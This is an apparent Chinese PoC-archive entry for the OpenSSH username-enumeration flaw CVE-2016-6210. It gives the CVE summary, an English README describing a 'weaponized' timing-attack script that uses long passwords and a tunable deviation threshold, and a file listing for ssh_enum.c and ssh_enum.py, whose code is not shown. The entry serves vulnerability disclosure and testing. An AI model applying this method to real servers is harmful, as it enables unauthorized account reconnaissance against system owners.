关联漏洞
标题:
OpenSSH 信息泄露漏洞
(CVE-2016-6210)
描述:OpenSSH(OpenBSD Secure Shell)是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 7.3之前版本中的sshd存在信息泄露漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。
描述
OpenSSH Username Enumeration - CVE-2016-6210
介绍
## This is the first version of the "weaponized" exploit for `CVE-2016-6210`
### Background:
Posted by Eddie Harari on Full Disclosure
http://seclists.org/fulldisclosure/2016/Jul/51
###### The brief:
>By sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most
modern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.
###### The (more) technical:
>When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD
source code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.
If real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter
response time from the server for non-existing users.
**NOTE: Mr. Harari tested this on `opensshd-7.2p2`, while my testing was done on `OpenSSH_6.9p1`.**
The script is currently based around a 10-30% range of deviation for timing(s) of valid versus invalid usernames. Currently only >20% are accepted as a valid usernames and appended to the output list accordingly (feel free to tweak this within the script). This has proved effective for me.
* More information on the process/background: https://justifysecurity.com/blog/weaponizing-cve-2016-6210/
`Bringing this project over to Github from Bitbucket.`
文件快照
[4.0K] /data/pocs/9a133f5cf70ca7a04a46efcfba949777adc18471
├── [1.4K] README.md
├── [5.9K] ssh_enum.c
└── [3.5K] ssh_enum.py
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。